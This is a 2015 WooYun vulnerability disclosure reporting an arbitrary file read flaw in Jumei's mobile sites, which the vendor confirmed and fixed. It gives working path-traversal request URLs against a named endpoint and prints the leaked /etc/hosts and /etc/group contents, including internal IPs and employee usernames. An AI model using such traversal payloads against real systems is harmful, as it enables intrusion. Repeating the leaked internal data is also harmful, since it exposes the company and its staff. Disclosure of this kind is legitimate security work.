当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115874

漏洞标题:聚美优品web安全测试之核心站点任意文件读取+包含可getshell-3

相关厂商:聚美优品

漏洞作者: 爱上平顶山

提交时间:2015-05-24 13:43

修复时间:2015-05-24 14:19

公开时间:2015-05-24 14:19

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-24: 厂商已经确认,细节仅向厂商公开
2015-05-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

20rank呢~ 木JJ的家伙们

详细说明:

核心站点任意文件读取
http://m.jumei.com/
http://m.staging.jumei.com/
request_delegate?url= 控制不严

00.jpg


0.jpg


1.jpg


2.jpg


移动端 m.jumei.com的:

3.jpg


4.jpg


http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/hosts
127.0.0.1 localhost aio.ws.reemake.com
10.0.80.1 debian
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.0.212.65 ll-000212065-api1.mob.prod.bj1
http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/group
root:x:0:
jumeiops:x:10001:
jumeiplat:x:10002:
jumeidev:x:10003:
jumeidba:x:10004:
jumeisec:x:10005:
jumeiadmin:x:20000:weibinf,qih1,dongdongf2,mengmengc,hanz,xiw4
jumeiqa:x:10006:
zabbix:x:107:
nagios:x:108:
logs:x:998:
.
..
...


ok
不给20rank木JJ..

漏洞证明:

··

修复方案:

xx

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-24 13:48

厂商回复:

这个洞很不错,感谢!

最新状态:

2015-05-24:先补了,多谢!